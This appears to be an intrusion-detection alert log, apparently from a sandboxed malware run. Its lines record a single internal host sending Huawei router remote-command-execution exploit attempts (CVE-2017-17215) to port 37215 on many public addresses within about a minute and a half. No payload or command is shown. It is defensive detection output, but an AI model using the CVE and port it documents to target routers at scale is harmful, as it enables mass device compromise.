                                                        06/13/24-21:32:34.213577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935237215192.168.2.14197.217.51.139
                                                        06/13/24-21:32:03.276925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091237215192.168.2.14156.200.130.213
                                                        06/13/24-21:32:23.938624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959637215192.168.2.14197.238.111.75
                                                        06/13/24-21:32:17.670522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414037215192.168.2.14156.203.73.240
                                                        06/13/24-21:32:44.477580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133837215192.168.2.1441.35.131.127
                                                        06/13/24-21:31:57.131175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5962237215192.168.2.1441.201.218.232
                                                        06/13/24-21:32:07.401716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408037215192.168.2.14197.255.106.184
                                                        06/13/24-21:33:07.041859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512237215192.168.2.14197.9.198.214
                                                        06/13/24-21:33:05.016797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741237215192.168.2.14156.90.28.33
                                                        06/13/24-21:31:57.132950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877637215192.168.2.14156.53.227.174
                                                        06/13/24-21:32:15.610174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299837215192.168.2.1441.173.107.110
                                                        06/13/24-21:32:44.454426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746037215192.168.2.14197.69.134.254
                                                        06/13/24-21:32:09.439908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357637215192.168.2.14156.250.150.3
                                                        06/13/24-21:32:48.568511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894237215192.168.2.14197.124.124.158
                                                        06/13/24-21:32:07.416124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5836637215192.168.2.14197.32.49.216
                                                        06/13/24-21:32:46.508321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384237215192.168.2.1441.155.46.18
                                                        06/13/24-21:32:25.975543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631837215192.168.2.1441.189.235.45
                                                        06/13/24-21:33:09.108616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688437215192.168.2.14156.147.51.28
                                                        06/13/24-21:32:15.608088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507037215192.168.2.14197.77.240.185
                                                        06/13/24-21:32:46.508153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4195637215192.168.2.14197.20.5.196
                                                        06/13/24-21:33:00.870521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615037215192.168.2.14156.187.71.202
                                                        06/13/24-21:32:54.707374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884037215192.168.2.14197.41.25.108
                                                        06/13/24-21:32:40.355774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512637215192.168.2.14156.196.125.7
                                                        06/13/24-21:32:56.790064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545237215192.168.2.14156.160.79.150
                                                        06/13/24-21:32:52.679570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150437215192.168.2.14197.242.6.168
                                                        06/13/24-21:33:15.252479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237837215192.168.2.14197.244.174.224
                                                        06/13/24-21:32:19.754448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5072237215192.168.2.14197.211.189.248
                                                        06/13/24-21:33:09.109315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783837215192.168.2.14197.33.203.87
                                                        06/13/24-21:32:11.506316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316637215192.168.2.1441.189.32.20
                                                        06/13/24-21:32:44.450610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871437215192.168.2.14197.204.110.97
                                                        06/13/24-21:32:19.749930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091837215192.168.2.1441.144.113.214
                                                        06/13/24-21:32:23.831756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795437215192.168.2.14197.194.229.60
                                                        06/13/24-21:32:56.759283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5455237215192.168.2.14197.177.68.191
                                                        06/13/24-21:33:17.307117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076837215192.168.2.14156.239.255.249
                                                        06/13/24-21:33:09.107513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987637215192.168.2.14156.209.60.35
                                                        06/13/24-21:32:09.440315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536637215192.168.2.14197.130.145.215
                                                        06/13/24-21:32:13.565471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4480637215192.168.2.1441.41.182.49
                                                        06/13/24-21:32:15.603987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340237215192.168.2.14156.36.160.75
                                                        06/13/24-21:32:30.073623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909437215192.168.2.14156.111.212.231
                                                        06/13/24-21:31:59.175738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567637215192.168.2.1441.160.194.101
                                                        06/13/24-21:32:13.545199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3436437215192.168.2.14156.116.126.128
                                                        06/13/24-21:32:38.317164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681237215192.168.2.1441.243.66.92
                                                        06/13/24-21:32:17.696335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3329037215192.168.2.1441.36.68.51
                                                        06/13/24-21:32:32.153578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5178637215192.168.2.14197.133.134.39
                                                        06/13/24-21:33:13.227828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356037215192.168.2.14156.117.253.101
                                                        06/13/24-21:33:04.991949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128637215192.168.2.14156.15.72.208
                                                        06/13/24-21:32:07.415385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737237215192.168.2.14197.71.244.127
                                                        06/13/24-21:32:19.731093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4425437215192.168.2.14197.169.105.154
                                                        06/13/24-21:33:00.889822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853237215192.168.2.14156.189.254.218
                                                        06/13/24-21:32:15.610450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4548237215192.168.2.14197.200.68.72
                                                        06/13/24-21:32:40.353081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103437215192.168.2.14156.198.100.172
                                                        06/13/24-21:32:07.402026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043437215192.168.2.14156.57.4.180
                                                        06/13/24-21:32:52.678381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509037215192.168.2.1441.171.59.11
                                                        06/13/24-21:32:44.457813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038237215192.168.2.1441.218.54.115
                                                        06/13/24-21:32:13.546096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575637215192.168.2.1441.200.64.141
                                                        06/13/24-21:33:11.157583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068437215192.168.2.1441.146.173.240
                                                        06/13/24-21:33:09.085024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088437215192.168.2.14197.17.152.152
                                                        06/13/24-21:32:30.101135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5898237215192.168.2.14156.102.23.205
                                                        06/13/24-21:33:04.991463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781437215192.168.2.1441.148.79.197
                                                        06/13/24-21:32:54.726494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385037215192.168.2.14156.163.36.234
                                                        06/13/24-21:32:09.456095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499437215192.168.2.1441.231.130.130
                                                        06/13/24-21:32:11.488163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836437215192.168.2.1441.136.117.124
                                                        06/13/24-21:32:30.101227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092637215192.168.2.14156.154.120.130
                                                        06/13/24-21:32:40.356033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4218437215192.168.2.14156.74.55.148
                                                        06/13/24-21:32:30.077165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244637215192.168.2.14197.248.116.177
                                                        06/13/24-21:33:15.256983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378637215192.168.2.14197.148.177.131
                                                        06/13/24-21:33:13.230640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3955037215192.168.2.14156.92.108.205
                                                        06/13/24-21:33:04.992877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157037215192.168.2.14156.143.34.123
                                                        06/13/24-21:33:11.155509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487037215192.168.2.1441.61.150.220
                                                        06/13/24-21:32:01.248705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5156237215192.168.2.14197.245.22.135
                                                        06/13/24-21:32:50.612008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744037215192.168.2.1441.180.108.72
                                                        06/13/24-21:32:30.076521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5470237215192.168.2.14197.61.142.243
                                                        06/13/24-21:31:59.195595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966637215192.168.2.1441.67.82.18
                                                        06/13/24-21:33:09.131031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800037215192.168.2.1441.250.185.113
                                                        06/13/24-21:32:50.611209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234437215192.168.2.14197.74.188.20
                                                        06/13/24-21:32:54.707823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353837215192.168.2.1441.182.45.167
                                                        06/13/24-21:32:38.322270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577437215192.168.2.14156.153.224.165
                                                        06/13/24-21:32:13.564201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934637215192.168.2.14197.70.86.158
                                                        06/13/24-21:32:46.527581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3466037215192.168.2.14197.73.64.229
                                                        06/13/24-21:32:52.659362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530837215192.168.2.14197.225.121.24
                                                        06/13/24-21:32:34.196512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710837215192.168.2.14197.61.3.34
                                                        06/13/24-21:32:34.199817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297237215192.168.2.1441.167.56.193
                                                        06/13/24-21:32:03.308885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832237215192.168.2.1441.127.240.66
                                                        06/13/24-21:33:07.040148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661837215192.168.2.14156.45.149.75
                                                        06/13/24-21:33:11.173402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032637215192.168.2.14156.168.76.132
                                                        06/13/24-21:32:13.567990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777837215192.168.2.14156.71.51.28
                                                        06/13/24-21:33:15.275288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703637215192.168.2.14197.226.73.205
                                                        06/13/24-21:32:34.213372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5963837215192.168.2.1441.213.201.97
                                                        06/13/24-21:32:48.567737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302437215192.168.2.1441.123.190.111
                                                        06/13/24-21:33:09.107237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353237215192.168.2.14197.174.186.171
                                                        06/13/24-21:32:50.632500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174437215192.168.2.14156.42.154.120
                                                        06/13/24-21:32:36.244358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599237215192.168.2.14156.82.51.228
                                                        06/13/24-21:32:38.301740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944437215192.168.2.1441.193.104.185
                                                        06/13/24-21:32:36.269314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866637215192.168.2.14197.64.187.150
                                                        06/13/24-21:32:52.678717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089237215192.168.2.14197.178.194.240
                                                        06/13/24-21:33:00.870849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906037215192.168.2.14156.183.23.91
                                                        06/13/24-21:32:34.191177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4846037215192.168.2.14197.196.26.240
                                                        06/13/24-21:32:25.997247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468837215192.168.2.1441.32.163.70
                                                        06/13/24-21:31:57.093899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191637215192.168.2.14197.214.25.244
                                                        06/13/24-21:32:56.755264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023237215192.168.2.1441.71.39.147
                                                        06/13/24-21:32:25.977422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719837215192.168.2.1441.100.121.237
                                                        06/13/24-21:32:46.527989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819837215192.168.2.14156.115.174.52
                                                        06/13/24-21:33:00.866844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851437215192.168.2.14156.176.138.172
                                                        06/13/24-21:32:42.405911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4073037215192.168.2.14156.48.128.7
                                                        06/13/24-21:32:40.374673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022237215192.168.2.14156.1.81.80
                                                        06/13/24-21:32:56.754720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814637215192.168.2.14156.13.79.1
                                                        06/13/24-21:32:34.190891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895637215192.168.2.14156.53.115.105
                                                        06/13/24-21:33:00.867615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283037215192.168.2.14156.55.29.238
                                                        06/13/24-21:32:36.267702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853637215192.168.2.14156.91.110.213
                                                        06/13/24-21:32:42.420377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859437215192.168.2.14197.91.200.51
                                                        06/13/24-21:33:00.869414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379437215192.168.2.14156.119.175.45
                                                        06/13/24-21:32:21.805953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534637215192.168.2.14197.90.213.104
                                                        06/13/24-21:32:40.377108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494837215192.168.2.1441.130.125.161
                                                        06/13/24-21:32:21.782947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5944237215192.168.2.1441.193.11.201
                                                        06/13/24-21:33:04.994165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028237215192.168.2.14197.162.244.205
                                                        06/13/24-21:32:03.277361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267237215192.168.2.14156.252.194.48
                                                        06/13/24-21:33:00.889659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977037215192.168.2.14197.130.84.17
                                                        06/13/24-21:32:48.569829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4587837215192.168.2.1441.207.2.3
                                                        06/13/24-21:32:09.456872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3573437215192.168.2.1441.219.124.160
                                                        06/13/24-21:32:52.657522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070037215192.168.2.14197.184.80.190
                                                        06/13/24-21:32:09.440431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389237215192.168.2.1441.150.80.146
                                                        06/13/24-21:32:01.224840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538637215192.168.2.14156.15.6.23
                                                        06/13/24-21:32:19.726684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723837215192.168.2.14197.149.41.67
                                                        06/13/24-21:32:50.612903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091237215192.168.2.14197.182.58.229
                                                        06/13/24-21:31:57.154302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715837215192.168.2.14197.69.12.126
                                                        06/13/24-21:32:23.941951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754637215192.168.2.14156.26.167.13
                                                        06/13/24-21:32:09.438118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808237215192.168.2.14156.5.250.193
                                                        06/13/24-21:32:34.215473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003437215192.168.2.14156.188.156.10
                                                        06/13/24-21:32:56.789158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389637215192.168.2.14156.130.182.59
                                                        06/13/24-21:33:02.909709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638037215192.168.2.1441.184.142.238
                                                        06/13/24-21:31:59.197104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562037215192.168.2.14197.74.195.55
                                                        06/13/24-21:32:05.344515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863237215192.168.2.14156.179.40.130
                                                        06/13/24-21:32:17.695133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182837215192.168.2.1441.196.185.220
                                                        06/13/24-21:32:52.659234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528037215192.168.2.1441.223.91.10
                                                        06/13/24-21:32:05.368643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3343437215192.168.2.14197.233.145.144
                                                        06/13/24-21:33:02.914722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678437215192.168.2.1441.166.124.116
                                                        06/13/24-21:32:05.378543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391837215192.168.2.14197.22.127.100
                                                        06/13/24-21:32:52.659682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554437215192.168.2.14156.173.112.149
                                                        06/13/24-21:32:36.262846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536437215192.168.2.14156.56.66.20
                                                        06/13/24-21:32:21.786043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131837215192.168.2.14156.67.218.203
                                                        06/13/24-21:32:40.356909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660037215192.168.2.1441.183.80.139
                                                        06/13/24-21:33:02.937412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790237215192.168.2.14156.201.120.242
                                                        06/13/24-21:32:30.128142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287437215192.168.2.1441.96.135.250
                                                        06/13/24-21:32:48.573448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5178037215192.168.2.14156.28.151.124
                                                        06/13/24-21:32:46.523492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764037215192.168.2.14156.54.79.159
                                                        06/13/24-21:33:15.271987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379237215192.168.2.1441.90.85.36
                                                        06/13/24-21:33:00.888640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599437215192.168.2.14197.192.30.112
                                                        06/13/24-21:32:19.752554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764437215192.168.2.14156.69.211.121
                                                        06/13/24-21:32:21.805154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555437215192.168.2.14197.246.118.4
                                                        06/13/24-21:32:13.566915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5954837215192.168.2.1441.221.131.121
                                                        06/13/24-21:33:11.180159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995637215192.168.2.14156.218.30.100
                                                        06/13/24-21:32:58.824131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898037215192.168.2.1441.55.177.254
                                                        06/13/24-21:32:30.096906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395837215192.168.2.14197.168.58.170
                                                        06/13/24-21:32:50.613572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372037215192.168.2.14156.47.145.39
                                                        06/13/24-21:32:38.321525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139637215192.168.2.1441.6.92.35
                                                        06/13/24-21:32:52.655635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615637215192.168.2.1441.76.191.110
                                                        06/13/24-21:32:23.945844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688237215192.168.2.14197.19.174.175
                                                        06/13/24-21:33:11.174179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892637215192.168.2.14197.136.20.125
                                                        06/13/24-21:32:15.610982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017237215192.168.2.1441.203.245.148
                                                        06/13/24-21:32:36.262733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066437215192.168.2.14197.252.250.209
                                                        06/13/24-21:32:46.502228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705037215192.168.2.14197.129.81.48
                                                        06/13/24-21:33:09.085734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573237215192.168.2.14197.50.69.122
                                                        06/13/24-21:32:34.193439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869037215192.168.2.14197.2.163.224
                                                        06/13/24-21:32:36.268409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304237215192.168.2.14156.119.239.28
                                                        06/13/24-21:32:01.222430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4171637215192.168.2.14156.165.103.83
                                                        06/13/24-21:32:48.556191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040237215192.168.2.14156.164.131.134
                                                        06/13/24-21:32:48.572214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116037215192.168.2.14197.238.59.239
                                                        06/13/24-21:32:13.545119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591037215192.168.2.1441.58.243.138
                                                        06/13/24-21:33:02.909011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009237215192.168.2.14197.221.179.141
                                                        06/13/24-21:32:17.702567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384637215192.168.2.1441.18.234.231
                                                        06/13/24-21:33:09.130875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905237215192.168.2.1441.187.9.81
                                                        06/13/24-21:32:09.438996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868037215192.168.2.14156.97.232.229
                                                        06/13/24-21:32:32.170254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799637215192.168.2.14197.120.127.248
                                                        06/13/24-21:33:09.110135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018837215192.168.2.14156.216.2.146
                                                        06/13/24-21:32:30.077435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434837215192.168.2.14197.216.85.87
                                                        06/13/24-21:33:15.271987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379237215192.168.2.1441.90.85.36
                                                        06/13/24-21:32:40.355474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577037215192.168.2.14197.58.223.206
                                                        06/13/24-21:32:46.502877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3527437215192.168.2.14156.45.215.51
                                                        06/13/24-21:33:13.229304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3791437215192.168.2.1441.164.46.19
                                                        06/13/24-21:33:13.229708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378037215192.168.2.1441.62.186.87
                                                        06/13/24-21:32:15.634491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632837215192.168.2.14197.252.194.104
                                                        06/13/24-21:32:42.407753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689437215192.168.2.14156.7.60.9
                                                        06/13/24-21:32:28.043888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071637215192.168.2.1441.6.207.59
                                                        06/13/24-21:32:07.403028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683237215192.168.2.14197.107.203.153
                                                        06/13/24-21:32:52.654724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204637215192.168.2.1441.68.224.182
                                                        06/13/24-21:32:19.730374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3461837215192.168.2.1441.25.2.192
